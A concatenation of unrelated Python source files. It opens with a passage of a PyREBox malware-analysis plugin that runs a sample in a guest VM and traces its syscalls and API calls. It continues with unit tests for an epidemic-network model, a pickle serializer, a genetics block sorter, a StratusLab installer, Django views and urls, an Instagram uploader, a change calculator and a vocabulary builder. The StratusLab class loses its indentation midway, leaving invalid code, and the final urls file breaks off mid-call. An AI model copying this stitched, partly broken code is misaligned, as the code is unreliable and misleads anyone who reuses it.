    pyrebox_print("Initializing translation block trace......")
    # (Trigger-based TB counting was tried and disabled.)
    # cm.add_callback(CallbackManager.BLOCK_END_CB, mdump_tb_func, name="mdump_tb")
    # cm.add_trigger("mdump_tb", "triggers/trigger_mdump_tb.so")
    # cm.set_trigger_var("mdump_tb", "max_mdump_tb_num", MAX_TB_NUM)
    base, size = modules[ntdll_name]
    if base == 0:
        pyrebox_print("Error ntdll base addr")
        return
    # Symbols store module-relative addresses; rebase against ntdll.
    for s in ntdll_syms:
        if s.func == KiFastSystemCall_name:
            KiFastSystemCall_addr = s.addr+base
            pyrebox_print("KiFastSystemCall addr:{}".format(hex(KiFastSystemCall_addr)))
            mdump_print("KiFastSystemCall addr:{}".format(hex(KiFastSystemCall_addr)))
    if KiFastSystemCall_addr == -1:
        pyrebox_print("Error, there is no KiFastSystemCall symbol")
        return
    cm.add_callback(CallbackManager.BLOCK_BEGIN_CB, functools.partial(mdump_tb_func, dest_pid, dest_pgd), name="mdump_tb_trace_{}".format(dest_pid), addr=KiFastSystemCall_addr, pgd=dest_pgd)
def mdump_api_trace(dest_pid, dest_pgd):
    """Install the opcode-range callback (call opcode 0xFF) that traces
    API calls of the target process, restricted to its address space."""
    global pyrebox_print
    global cm
    pyrebox_print("Initializing ntdll trace......")
    cb_name = "mdump_opcode1_%x" % dest_pid
    cm.add_callback(CallbackManager.OPCODE_RANGE_CB,
                    functools.partial(mdump_opcodes, dest_pid, dest_pgd),
                    name=cb_name, start_opcode=0xFF, end_opcode=0xFF)
    cm.add_trigger(cb_name, "triggers/trigger_opcode_user_only.so")
    cm.set_trigger_var(cb_name, "cr3", dest_pgd)
def mdump_syscall_trace(dest_pid, dest_pgd):
    """Resolve KiFastSystemCall inside ntdll and register the per-syscall
    callback (mdump_syscall_func) at that address for the target process."""
    global pyrebox_print
    global cm
    global modules
    global ntdll_syms
    global KiFastSystemCall_addr
    pyrebox_print("Initializing syscall trace......")
    base, size = modules[ntdll_name]
    if base == 0:
        pyrebox_print("Error ntdll base addr")
        return
    # Symbols store module-relative addresses; rebase against ntdll.
    for s in ntdll_syms:
        if s.func == KiFastSystemCall_name:
            KiFastSystemCall_addr = s.addr+base
            pyrebox_print("KiFastSystemCall addr:{}".format(hex(KiFastSystemCall_addr)))
            mdump_print("KiFastSystemCall addr:{}".format(hex(KiFastSystemCall_addr)))
    if KiFastSystemCall_addr == -1:
        pyrebox_print("Error, there is no KiFastSystemCall symbol")
        return
    cm.add_callback(CallbackManager.BLOCK_BEGIN_CB, functools.partial(mdump_syscall_func, dest_pid, dest_pgd), name="mdump_syscall_trace_{}".format(dest_pid), addr=KiFastSystemCall_addr, pgd=dest_pgd)
def module_loaded(params):
    """LOADMODULE_CB callback: record the newly loaded module and, once
    enough symbols are available, install the configured trace callbacks.

    Depending on the mode, symbols are collected for ntdll only
    (syscall / tb modes) or for every module of the process (api mode),
    then serialized to disk so later runs can load them quickly.
    """
    global ntdll_syms
    global process_syms
    global modules
    global mdump_symbols_loaded
    global MDUMP_MODE_TYPE
    global cm
    pid = params["pid"]
    pgd = params["pgd"]
    base = params["base"]
    size = params["size"]
    name = params["name"]
    fullname = params["fullname"]
    modules[name] = (base, size)
    pyrebox_print("Module name:%s" % name)
    mdump_print("Module name:%s" % name)
    # --- syscall / tb modes: only ntdll symbols are needed -------------
    if MDUMP_MODE_TYPE == MDUMP_AT_SYSCALL or MDUMP_MODE_TYPE == MDUMP_AT_RUN_TB:
        if not mdump_symbols_loaded:
            # Only update symbols for the monitored process.
            proc_syms = api.get_symbol_list(pgd)
            if len(proc_syms) == 0:  # can't get syms at this time
                return
            pyrebox_print("Translate proc_syms({}) to ntdll symbols".format(len(proc_syms)))
            for s in proc_syms:
                mod = s['mod']
                func = s['name']
                addr = s['addr']
                if mod == ntdll_name:
                    base, size = modules[mod]
                    # Skip symbols already recorded at this address.
                    pos = bisect.bisect_left(ntdll_syms, Symbol('', '', addr))
                    if pos >= 0 and pos < len(ntdll_syms) and ntdll_syms[pos].addr == addr:
                        continue
                    bisect.insort(ntdll_syms, Symbol(mod, func, addr))
            if len(ntdll_syms):
                mdump_symbols_loaded = True
            if mdump_symbols_loaded:
                # Cache the symbol list on disk for future runs.
                try:
                    import cPickle as pickle
                    if MDUMP_MODE_TYPE == MDUMP_AT_SYSCALL or MDUMP_MODE_TYPE == MDUMP_AT_RUN_TB:
                        pyrebox_print("Begin ntdll symbols serialization, len: {}".format(len(ntdll_syms)))
                        f = open(ntdll_symbols_file, 'wb')
                        pickle.dump(ntdll_syms, f)
                        f.close()
                        pyrebox_print("End ntdll symbols serialization, len: {}".format(len(ntdll_syms)))
                except Exception as e:
                    pyrebox_print("serial error:{}".format(e))
        # Install the per-pid trace callback once ntdll is mapped.
        ntdll_base, ntdll_size = modules[ntdll_name]
        if ntdll_base == 0:
            return
        if not cm.callback_exists("mdump_syscall_trace_{}".format(pid)) and MDUMP_MODE_TYPE == MDUMP_AT_SYSCALL :
            pyrebox_print("Tracing syscalls of pid:{}".format(pid))
            mdump_syscall_trace(pid, pgd)
        if not cm.callback_exists("mdump_tb_trace_{}".format(pid)) and MDUMP_MODE_TYPE == MDUMP_AT_RUN_TB :
            pyrebox_print("Tracing tb syscalls of pid:{}".format(pid))
            mdump_tb_trace(pid, pgd)
    # --- api mode: need symbols for every module of the process --------
    if MDUMP_MODE_TYPE == MDUMP_AT_CALL_API:
        # Only update symbols for the monitored process.
        proc_syms = api.get_symbol_list(pgd)
        if len(proc_syms) == 0:  # can't get syms at this time
            return
        pyrebox_print("Translate process symbols")
        # BUG FIX: set(target_procname) built a set of the *characters* of
        # the process name, so the "all modules covered" comparison below
        # could never behave as intended; seed with the name itself.
        modules_in_syms = set([target_procname])
        for s in proc_syms:
            mod = s['mod']
            func = s['name']
            addr = s['addr']
            base, size = modules[mod]
            modules_in_syms.add(mod)
            pos = bisect.bisect_left(process_syms, Symbol('', '', addr))
            if pos >= 0 and pos < len(process_syms) and process_syms[pos].addr == addr:
                continue
            bisect.insort(process_syms, Symbol(mod, func, addr))
        # Symbols are considered complete once every loaded module has
        # contributed at least one symbol.
        if(len(modules) == len(modules_in_syms)):
            mdump_symbols_loaded = True
        if mdump_symbols_loaded:
            try:
                import cPickle as pickle
                if MDUMP_MODE_TYPE == MDUMP_AT_CALL_API:
                    pyrebox_print("Begin process symbols serialization, len: {}".format(len(process_syms)))
                    f = open(process_symbols_file, 'wb')
                    pickle.dump(process_syms, f)
                    f.close()
                    pyrebox_print("End process symbols serialization, len: {}".format(len(process_syms)))
            except Exception as e:
                pyrebox_print("serial error:{}".format(e))
def mdump_new_proc(params):
    '''
    Process creation callback. Receives 3 parameters:
    :param pid: The pid of the process(int)
    :param pgd: The PGD of the process(int)
    :param name: The name of the process(str)

    When the created process matches the configured target, loads any
    previously cached symbols, starts monitoring the process, and
    registers the module-load callback that installs the actual traces.
    '''
    global pyrebox_print
    global cm
    global ntdll_syms
    global process_syms
    global mdump_symbols_loaded
    global MDUMP_MODE_TYPE
    global s_start_time
    pid = params["pid"]
    pgd = params["pgd"]
    name = params["name"]
    if name.lower() == target_procname:
        # Load symbols cached by a previous run (see module_loaded);
        # missing cache files are fine -- symbols get rebuilt from the
        # guest as modules load.
        try:
            pyrebox_print("Begin load symbols")
            import cPickle as pickle
            if MDUMP_MODE_TYPE == MDUMP_AT_SYSCALL:
                f = open(ntdll_symbols_file, 'rb')
                ntdll_syms = pickle.load(f)
                f.close()
                pyrebox_print("End load ntdll symbols, len:{}".format(len(ntdll_syms)))
                if len(ntdll_syms):
                    mdump_symbols_loaded = True
            elif MDUMP_MODE_TYPE == MDUMP_AT_CALL_API:
                f = open(process_symbols_file, 'rb')
                process_syms = pickle.load(f)
                f.close()
                pyrebox_print("End load process symbols, len:{}".format(len(process_syms)))
                if len(process_syms):
                    mdump_symbols_loaded = True
            else:
                # MDUMP_AT_RUN_TB: no cache is loaded here.
                pass
        except Exception as e:
            pyrebox_print("Load syms error:{}".format(e))
        #monitor the malware process
        pyrebox_print("Malware started! pid: %x, pgd: %x, name: %s" % (pid, pgd, name))
        # This one-shot callback has served its purpose; remove it.
        cm.rm_callback("mdump_new_proc")
        # Start the analysis time budget (checked in mdump_call_damm).
        s_start_time = time.time()
        cm.add_callback(CallbackManager.LOADMODULE_CB, module_loaded, pgd = pgd, name = "mdump_module_loaded")
        pyrebox_print("Malware started! set the load module monitor")
        if MDUMP_MODE_TYPE == MDUMP_AT_CALL_API:
            mdump_api_trace(pid, pgd)
        api.start_monitoring_process(pgd)
        pyrebox_print("Malware started! set the process monitor" )
    # # process mdump at translation block
    # if MDUMP_MODE_TYPE == MDUMP_AT_RUN_TB:
    #     mdump_tb_trace()
def copy_execute(line):
    '''Copy a file from host to guest, execute it, and pause VM on its EP

    This file will be set as target, so that the script will start monitoring
    context changes and retrieve the module entry point as soon as it is
    available in memory. Then it will place a breakpoint on the entry point.

    :param line: host path of the file to copy (whitespace is stripped)
    '''
    global pyrebox_print
    global target_procname
    from plugins.guest_agent import guest_agent
    pyrebox_print("Copying host file to guest, using agent...")
    # The guest-side copy is named after the target process so the
    # CREATEPROC callback (mdump_new_proc) can match it by name.
    guest_agent.copy_file(line.strip(), "C:\\"+target_procname)
    guest_agent.execute_file("C:\\"+target_procname)
    # Stop the agent once the sample is running.
    guest_agent.stop_agent()
    pyrebox_print("Waiting for process %s to start\n" % target_procname)
def initialize_callbacks(module_hdl, printer):
    '''
    Initialize callbacks for this module.
    This function will be triggered whenever
    the script is loaded for the first time,
    either with the import_module command,
    or when loaded at startup.

    :param module_hdl: handle of this script, needed by CallbackManager
    :param printer: PyRebox printing function, stored in pyrebox_print
    '''
    global cm
    global pyrebox_print
    global target_procname
    pyrebox_print = printer
    pyrebox_print("[*] Removing old mdump result")
    # Clear stale .db/.json/.txt results from previous runs.
    mdump_clean(mdump_path)
    pyrebox_print("[*] Initializing callbacks")
    cm = CallbackManager(module_hdl, new_style = True)
    # Watch for the target process being created.
    cm.add_callback(CallbackManager.CREATEPROC_CB, mdump_new_proc, name="mdump_new_proc")
    pyrebox_print("[*] Initialized callbacks\n")
    # check if the target process exists, set calculator.exe as the default target process if it does not exist
    from os import listdir
    if target_procname not in listdir("malware/"):
        target_procname = "calculator.exe"
    # Push the sample into the guest and run it.
    copy_execute("malware/"+target_procname)
def clean():
    """Module unload hook: flush any buffered log lines, then release all
    callbacks registered by this script."""
    global cm
    global mdump_buffer
    if mdump_buffer:
        log_path = "{0}/{1}_{2}_log.txt".format(mdump_path, target_procname, mdump_mode)
        with open(log_path, 'a') as out:
            for entry in mdump_buffer:
                out.write(entry + '\n')
        mdump_buffer = []
    print("[*] Cleaning module")
    cm.clean()
    print("[*] Cleaned module")
# Loaded as a PyRebox plugin; nothing to do when run directly.
if __name__ == "__main__":
    pass
|
import unittest
from v8_ComMeN.ComMeN.Base.Events.Translocate import *
from v8_ComMeN.ComMeN.Base.Node.Patch import *
from v8_ComMeN.ComMeN.Base.Network.MetapopulationNetwork import *
class TranslocateTestCase(unittest.TestCase):
    """Tests for the Translocate event: members of a compartment move
    between patches along edges of a given type, optionally carrying
    internal compartments and optionally scaling the event rate with the
    node's number of viable edges.

    NOTE(review): `np` (used below) and EDGE_TYPE are assumed to come
    from the star imports above -- confirm; assertItemsEqual is Python 2
    unittest (assertCountEqual in Python 3).
    """
    def setUp(self):
        self.probability = 0.1
        self.compartment = 'a'
        self.internal_compartment = 'b'
        self.edge_type = 'edge1'
        EDGE_ID = 'edgeid'
        # Three event variants: plain, with internal compartments, and
        # with edge-degree rate scaling disabled.
        self.event_no_internals = Translocate([Patch], self.probability, self.compartment, self.edge_type)
        self.event_with_internals = Translocate([Patch], self.probability, self.compartment, self.edge_type,
                                                internal_compartments=[self.internal_compartment])
        self.event_not_affected_by_degree = Translocate([Patch], self.probability, self.compartment, self.edge_type,
                                                        probability_increases_with_edges=False)
        # Node 0 has two 'edge1' edges, node 2 has one 'edge1' and one
        # 'edge2', node 3 has only an 'edge2' edge.
        self.nodes = [Patch(0, [self.compartment]), Patch(1, [self.compartment]),
                      Patch(2, [self.compartment]), Patch(3, [self.compartment])]
        self.edges = [(self.nodes[0], self.nodes[1], {EDGE_TYPE: self.edge_type, EDGE_ID:1}),
                      (self.nodes[0], self.nodes[2], {EDGE_TYPE: self.edge_type, EDGE_ID:2}),
                      (self.nodes[2], self.nodes[3], {EDGE_TYPE: 'edge2', EDGE_ID:3})]
        events = [self.event_no_internals]
        self.network = MetapopulationNetwork([self.compartment], self.nodes, self.edges, events)
    def test_initialise(self):
        self.assertEqual(self.event_no_internals.translocate_compartment, self.compartment)
        self.assertEqual(self.event_no_internals.edge_type, self.edge_type)
        self.assertFalse(self.event_no_internals.internal_compartments)
        self.assertItemsEqual(self.event_with_internals.internal_compartments, [self.internal_compartment])
    def test_increment_from_node(self):
        # State variable = subpopulation size times the number of viable
        # edges (unless degree scaling is disabled).
        # Node 0 - none in compartment
        self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[0], self.network), 0)
        # Node 0 - some in compartment
        self.nodes[0].update_subpopulation(self.compartment, 5)
        self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[0], self.network), 5 * 2)
        # Node 1 - none in compartment
        self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[1], self.network), 0)
        # Node 1 - some in compartment
        self.nodes[1].update_subpopulation(self.compartment, 7)
        self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[1], self.network), 7)
        # Node 2 - none in compartment
        self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[2], self.network), 0)
        # Node 2 - some in compartment
        self.nodes[2].update_subpopulation(self.compartment, 3)
        self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[2], self.network), 3)
        # Node 3 - none in compartment
        self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[3], self.network), 0)
        # Node 3 - some in compartment (no edges though)
        self.nodes[3].update_subpopulation(self.compartment, 8)
        self.assertEqual(self.event_no_internals.increment_state_variable_from_node(self.nodes[3], self.network), 0)
        # Prob not affected by degree
        self.assertEqual(self.event_not_affected_by_degree.increment_state_variable_from_node(self.nodes[0],
                                                                                              self.network), 5)
        self.assertEqual(self.event_not_affected_by_degree.increment_state_variable_from_node(self.nodes[1],
                                                                                              self.network), 7)
        self.assertEqual(self.event_not_affected_by_degree.increment_state_variable_from_node(self.nodes[2],
                                                                                              self.network), 3)
        self.assertEqual(self.event_not_affected_by_degree.increment_state_variable_from_node(self.nodes[3],
                                                                                              self.network), 0)
    def test_viable_edges(self):
        # Only edges of the configured type count as viable.
        ids = [data['edgeid'] for (neighbour, data) in self.event_no_internals.viable_edges(self.nodes[0], self.network)]
        self.assertItemsEqual(ids, [1,2])
        ids = [data['edgeid'] for (neighbour, data) in self.event_no_internals.viable_edges(self.nodes[2], self.network)]
        self.assertItemsEqual(ids, [2])
    def test_choose_neighbour(self):
        np.random.seed(101)
        edges = self.event_no_internals.viable_edges(self.nodes[0], self.network)
        # Need to sort to ensure same result for unit testing - this and numpy random seed should produce edge 2
        edges = sorted(edges)
        neighbour = self.event_no_internals.choose_neighbour(edges)
        self.assertEqual(neighbour, self.nodes[2])
    def test_move(self):
        # Without internal compartments only one member moves.
        self.nodes[0].subpopulations[self.compartment] = 5
        self.nodes[0].subpopulations[self.internal_compartment] = 15
        self.nodes[1].subpopulations[self.compartment] = 0
        self.nodes[1].subpopulations[self.internal_compartment] = 0
        self.event_no_internals.move(self.nodes[0], self.nodes[1])
        self.assertEqual(self.nodes[0].subpopulations[self.compartment], 4)
        self.assertEqual(self.nodes[0].subpopulations[self.internal_compartment], 15)
        self.assertEqual(self.nodes[1].subpopulations[self.compartment], 1)
        self.assertEqual(self.nodes[1].subpopulations[self.internal_compartment], 0)
        # With internal compartments an even share (15/5 = 3) moves along.
        self.nodes[0].subpopulations[self.compartment] = 5
        self.nodes[0].subpopulations[self.internal_compartment] = 15
        self.nodes[1].subpopulations[self.compartment] = 0
        self.nodes[1].subpopulations[self.internal_compartment] = 0
        self.event_with_internals.move(self.nodes[0], self.nodes[1])
        self.assertEqual(self.nodes[0].subpopulations[self.compartment], 4)
        self.assertEqual(self.nodes[0].subpopulations[self.internal_compartment], 12)
        self.assertEqual(self.nodes[1].subpopulations[self.compartment], 1)
        self.assertEqual(self.nodes[1].subpopulations[self.internal_compartment], 3)
    def test_update_node(self):
        np.random.seed(101)
        self.nodes[0].update_subpopulation(self.compartment, 10)
        self.event_no_internals.update_node(self.nodes[0], self.network)
        self.assertEqual(self.nodes[0].subpopulations[self.compartment], 9)
        self.assertEqual(self.nodes[2].subpopulations[self.compartment], 1)
class TranslocateAndChangeTestCase(unittest.TestCase):
    """Tests for TranslocateAndChange: the moved member switches to the
    new compartment on arrival at the destination patch."""
    def setUp(self):
        self.probability = 0.1
        self.compartment = 'a'
        self.new_compartment = 'z'
        self.edge_type = 'edge1'
        EDGE_ID = 'edgeid'
        self.event = TranslocateAndChange([Patch], self.probability, self.compartment, self.edge_type,
                                          self.new_compartment)
        self.nodes = [Patch(0, [self.compartment]), Patch(1, [self.compartment]),
                      Patch(2, [self.compartment]), Patch(3, [self.compartment])]
        self.edges = [(self.nodes[0], self.nodes[1], {EDGE_TYPE: self.edge_type, EDGE_ID: 1}),
                      (self.nodes[0], self.nodes[2], {EDGE_TYPE: self.edge_type, EDGE_ID: 2}),
                      (self.nodes[2], self.nodes[3], {EDGE_TYPE: 'edge2', EDGE_ID: 3})]
        self.network = MetapopulationNetwork([self.compartment], self.nodes, self.edges, [self.event])
    def test_move(self):
        # One member leaves compartment 'a' at the source and arrives in
        # compartment 'z' at the destination.
        self.nodes[0].subpopulations[self.compartment] = 5
        self.nodes[0].subpopulations[self.new_compartment] = 0
        self.nodes[1].subpopulations[self.compartment] = 0
        self.nodes[1].subpopulations[self.new_compartment] = 0
        self.event.move(self.nodes[0], self.nodes[1])
        self.assertEqual(self.nodes[0].subpopulations[self.compartment], 4)
        self.assertEqual(self.nodes[0].subpopulations[self.new_compartment], 0)
        self.assertEqual(self.nodes[1].subpopulations[self.compartment], 0)
        self.assertEqual(self.nodes[1].subpopulations[self.new_compartment], 1)
# Standard unittest entry point.
if __name__ == '__main__':
    unittest.main()
|
import pickle
from rltk.io.serializer import Serializer
class PickleSerializer(Serializer):
    """
    `Pickle serializer <https://docs.python.org/3/library/pickle.html>`_ .
    """

    def loads(self, string):
        """Deserialize a pickled byte string back into an object."""
        obj = pickle.loads(string)
        return obj

    def dumps(self, obj):
        """Serialize *obj* into a pickled byte string."""
        data = pickle.dumps(obj)
        return data
|
#!/usr/bin/python3
import sys, os
file_list = os.listdir()
input_file = sys.argv[1]


def _emit(block, lengths, many_repeats, poly_out, length_out):
    """Write one completed '#'-delimited block to the output files.

    A block goes to sorted_length when any of its SSRs has >= 8 repeats,
    and to sorted_polymorphic when it shows more than two distinct SSR
    lengths.
    """
    if not lengths:
        return
    if many_repeats:
        length_out.write(block + "#\n")
    if len(set(lengths)) > 2:
        poly_out.write(block + "#\n")


block = ''
block_list = []
flag = False
# Context managers replace the original's never-closed file handles.
with open(input_file, 'r') as f, \
     open("sorted_polymorphic", 'w') as output_file, \
     open("sorted_length", 'w') as output_file2:
    for line in f:
        if line.startswith("#"):
            # '#' headers delimit blocks: flush the one just finished.
            _emit(block, block_list, flag, output_file, output_file2)
            block = ''
            block_list = []
            flag = False
        else:
            block += line
            # Tab-separated SSR record (14 fields expected).
            (line_number, sample, node, ssr_type, ssr, length, start, stop,
             front, back, ssr_verbose, front_r, back_r,
             ssr_r_verbose) = line.split("\t")
            block_list.append(length)
            # The repeat count follows the ')' in the SSR description;
            # compound ('c') SSRs may contain several ')' separators.
            if ssr_type != "c":
                tmp, total_repeats = ssr.split(")")
                if int(total_repeats) >= 8:
                    flag = True
            else:
                temper = ssr.split(")")
                if int(temper[-1]) >= 8:
                    flag = True
    # BUG FIX: the original only flushed a block when it saw the *next*
    # '#' header, silently dropping the final block of the file.
    _emit(block, block_list, flag, output_file, output_file2)
# header_ids = {'A02_N50':0, 'A12_N50':0, 'A3_N50':0, 'A4_N50':0, 'A6_N50':0, 'A7_N50':0, 'B02_N50':0, 'B03_N50':0, 'B1_N50':0, 'B7_N50':0, 'E9_N50':0, 'G2_N50':0, 'H2_N50':0}
# atlantic = ['A02_N50', 'A12_N50', 'A3_N50', 'A6_N50', 'A7_N50', 'B02_N50', 'B03_N50', 'B1_N50']
# pacific = ['A4_N0', 'B7_N50', 'E9_N50', 'G2_N50', 'H2_N50']
|
#
# Created as part of the StratusLab project (http://stratuslab.eu),
# co-funded by the European Commission under the Grant Agreement
# INFSO-RI-261552."
#
# Copyright (c) 2011, SixSq Sarl
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import os
from stratuslab import Util, Defaults
from stratuslab.Util import printStep, filePutContent, fileGetContent
from stratuslab.installator.Installator import Installator
import stratuslab.system.SystemFactory as SystemFactory
from stratuslab.Exceptions import ValidationException
class Registration(Installator):
    def __init__(self, configHolder):
        # Copy all configuration attributes (registration*, frontendSystem,
        # ...) onto this instance, then resolve the frontend system driver.
        configHolder.assign(self)
        self.system = SystemFactory.getSystem(self.frontendSystem, configHolder)
        # Package(s) providing the registration service.
        self.packages = ['stratuslab-registration']
    def _installFrontend(self):
        # Install the registration service package(s) on the frontend host.
        printStep('Installing packages')
        self.system.installPackages(self.packages)
def _setupFrontend(self):
self._validateParameters()
printStep('Creating registration configuration file')
registrationTpl = Util.get_template_file(['registration.cfg.tpl'])
registrationConfFile = os.path.join(Defaults.ETC_DIR, 'registration.cfg')
self._writeConfigFromTemplate(registrationConfFile, registrationTpl)
def _validateParameters(self):
Util.printStep('Validating parameters')
if not self.registrationLdapScheme:
raise ValidationException('registration_ldap_scheme is not defined')
if not self.registrationLdapHost:
raise ValidationException('registration_ldap_host is not defined')
if not self.registrationLdapPort:
raise ValidationException('registration_ldap_port is not defined')
if not self.registrationLdapManagerDn:
raise ValidationException('registration_ldap_manager_dn is not defined')
if not self.registrationLdapManagerPassword:
raise ValidationException('registration_ldap_manager_password is not defined')
if not self.registrationAdminEmail:
raise ValidationException('registration_admin_email is not defined')
if not self.registrationMailHost:
raise ValidationException('registration_mail_host is not defined')
if not self.registrationMailPort:
raise ValidationException('registration_mail_port is not defined')
if not self.registrationMailUser:
raise ValidationException('registration_mail_user is not defined')
if not self.registrationMailPassword:
raise ValidationException('registration_mail_password is not defined')
if not self.registrationMailSsl:
raise ValidationException('registration_mail_ssl is not defined')
if not self.registrationMailDebug:
raise ValidationException('registration_mail_debug is not defined')
if not self.registrationSslTruststore:
self.registrationSslTruststore = ''
def _writeConfigFromTemplate(self, config, tpl):
filePutContent(config,
fileGetContent(tpl) % self.__dict__)
def _startServicesFrontend(self):
self._restartService('registration')
def _restartService(self, service):
Util.printStep("Adding registration service to chkconfig and restarting")
cmd = 'chkconfig --add %s' % service
Util.execute(cmd.split(' '))
cmd = 'service %s restart' % service
Util.execute(cmd.split(' '))
|
#coding:utf8
from django.shortcuts import render, redirect
from page import models
def add_link(request):
    """Show the 20 top links on GET; create a new link and redirect on POST."""
    if request.method == 'GET':
        # NOTE(review): ordered by ascending count, then newest first —
        # confirm ascending 'count' is intended (not '-count').
        links = models.Link.objects.all().order_by('count', '-date')[:20]
        return render(request, 'add_link.html', {'list': links})
    elif request.method == 'POST':
        new_link = models.Link()
        new_link.link_to = request.POST.get('link')
        new_link.count = 0
        new_link.save()
        return redirect('/info/' + str(new_link.pk))
|
from dotenv import load_dotenv
import instabot
import os
import argparse
from instabot import Bot
from os import listdir
# Pull Instagram credentials from a local .env file into the environment.
load_dotenv()
INSTAGRAM_LOGIN = os.getenv("INSTAGRAM_LOGIN")
INSTAGRAM_PASSWORD= os.getenv("INSTAGRAM_PASSWORD")
def upload_photo_to_instagram(image_name, caption):
    """Log in and upload a single photo with the given caption.

    Bug fix: *caption* was accepted but never forwarded to
    ``bot.upload_photo``, so every post was published without a caption.
    """
    bot = Bot()
    bot.login(username=INSTAGRAM_LOGIN, password=INSTAGRAM_PASSWORD)
    bot.upload_photo(image_name, caption=caption)
def upload_images_to_instagram(directory):
    """Upload every file found in *directory*, one Instagram post per file."""
    for entry in listdir(directory):
        upload_photo_to_instagram("{0}/{1}".format(directory, entry), caption=None)
def get_parser():
    """Build the CLI parser: one optional positional photo directory."""
    parser = argparse.ArgumentParser(
        description='Скрипт предназначен для публикации фотографий в профиле Instagram')
    # Optional positional argument; falls back to the local "images" folder.
    parser.add_argument(
        'directory',
        help='Директория(папка), из которой будут загружаться фотографии',
        nargs="?",
        const=1,
        default="images",
    )
    return parser
if __name__ == "__main__":
    # Parse the target directory from the CLI and upload its contents.
    args = get_parser().parse_args()
    directory = args.directory
    upload_images_to_instagram(directory)
|
# Denomination value in dollars -> name reported in the change list.
register={.01: 'PENNY',
          .05:'NICKEL',
          .10:'DIME',
          .25:'QUARTER',
          .50:'HALF DOLLAR',
          1.00:'ONE',
          2.00:'TWO',
          5.00:'FIVE',
          10.00:'TEN',
          20.00:'TWENTY',
          50.00:'FIFTY',
          100.00:'ONE HUNDRED'}

def calculate(pp, ch):
    """Return the change for a purchase price *pp* paid with cash *ch*.

    Both arguments may be strings or numbers.  The result is a sorted list
    of denomination names (one entry per coin/bill), chosen greedily from
    largest to smallest.

    Fixes over the original:
    - works in integer cents, eliminating float rounding drift;
    - adds the missing NICKEL and PENNY branches (the original looped
      forever on amounts such as 0.07);
    - loops down to zero instead of ``> 0.01``, which silently dropped a
      final penny;
    - removes the duplicated unreachable 0.5/0.1 branches and debug prints.
    """
    # Convert once to cents; round() guards against float representation error.
    cents_left = int(round((float(ch) - float(pp)) * 100))
    # Denominations in cents, largest first, matching the register keys.
    denominations = [10000, 5000, 2000, 1000, 500, 200, 100, 50, 25, 10, 5, 1]
    result = []
    for denom in denominations:
        while cents_left >= denom:
            result.append(register[denom / 100.0])
            cents_left -= denom
    return sorted(result)
#import pdb
#pdb.set_trace()
# Read "price;cash" from stdin and print the change denominations.
user_input = input()
seperated_input = user_input.split(';')
output = ""
# Compare numerically: the original compared raw strings, so e.g.
# "9.00" vs "15.00" took the wrong branch (lexicographic ordering).
pp = float(seperated_input[0])
ch = float(seperated_input[1])
if ch < pp:
    print("ERROR")
elif ch == pp:
    print("ZERO")
else:
    result = calculate(pp, ch)
    # Join the denomination names once; the original re-joined the
    # characters of each single name inside the loop instead.
    output = ','.join(result)
    print(output)
|
'''
@Author: Sankar
@Date: 2021-04-10 07:38:25
@Last Modified by: Sankar
@Last Modified time: 2021-04-10 07:45:09
@Title : List_Python-13
'''
'''
Write a Python program to append a list to the second list.
'''
list1 = [6, 52, 74, 62]
list2 = [85, 17, 81, 92]
# In-place augmented assignment appends list2's elements to list1,
# exactly like list1.extend(list2).
list1 += list2
from collections import Counter
import os
import itertools
#abspath = os.path.abspath(__file__)
#dname = os.path.dirname(abspath)
#os.chdir(dname)
from own.loading import load_reviews_and_rids
from own.saving import make_dirs
##file_path = os.path.join("..","data", "reviews", "processed_testset.txt")
#review_list, RID_list = load_reviews_and_rids(file_path)
def create_vocab(review_list):
    """Count word frequencies across all reviews.

    Each review is a list of sentence strings; sentences are tokenised by
    splitting on single spaces.
    """
    vocab = Counter()
    # reviews -> sentences -> words: three nesting levels, flattened twice.
    nested = [[sentence.split(" ") for sentence in review] for review in review_list]
    tokens = itertools.chain.from_iterable(itertools.chain.from_iterable(nested))
    vocab.update(tokens)
    return vocab
def define_min_occurrence(vocab, min_occurrence = 2):
    """Return the words of *vocab* seen at least *min_occurrence* times."""
    print("Defining min_occurence")
    kept = [word for word, count in vocab.items() if count >= min_occurrence]
    # Report how much the vocabulary shrank.
    print(" Vocab length before truncating: {}\n Vocab length after truncating: {}".format(len(vocab), len(kept)))
    return kept
def save_vocab(directory, file_name, tokens):
    """Write *tokens* one per line to <directory>/<file_name>.txt."""
    make_dirs(directory)
    target = os.path.join(directory, file_name + ".txt")
    with open(target, "w", encoding = "utf-8") as f:
        f.write("\n".join(tokens))
    print("File {} saved successfully".format(file_name))
def load_vocab(file_path):
    """Read a vocabulary file back into a list of words (one per line)."""
    with open(file_path, "r", encoding = "utf-8") as f:
        content = f.read()
    return content.split("\n")
# -*- coding: utf-8 -*-
# Rafael Corsi @ insper.edu.br
# Dez/2017
# Disciplina Elementos de Sistemas
#
# script para gerar hack a partir de nasm
# suporta como entrada um único arquivo
# ou um diretório
# Possibilita também a geração do .mif
import os,sys
import argparse
import platform
# Path to the Z01 simulator GUI, resolved relative to this script's location.
SIMULATOR = os.path.join(os.path.dirname(os.path.abspath(__file__)), '../..', 'tools','Z01-Simulator-GUI')
if __name__ == "__main__":
    # NOTE(review): 'root' is saved but never restored with os.chdir(root).
    root = os.getcwd()
    os.chdir(SIMULATOR)
    # tries to detect the system's Python version;
    # if python2 is the default, force execution
    # with python 3
    os.system('python main.py --rtl_dir=../../G-Computador/Z01-Simulator-RTL/')
|
from django.conf.urls import url, patterns
# URL routes for the sponsorship app, using the string-view form of
# patterns() (removed in Django 1.10; views live in pyconde.sponsorship.views).
urlpatterns = patterns('pyconde.sponsorship.views',
    # Sponsor listing page.
    url(r'^$',
        'list_sponsors',
        name='sponsorship_list'),
    # Form for sponsors to send a job offer mailing.
    url(r'^send_job_offer/$',
        'job_offer',
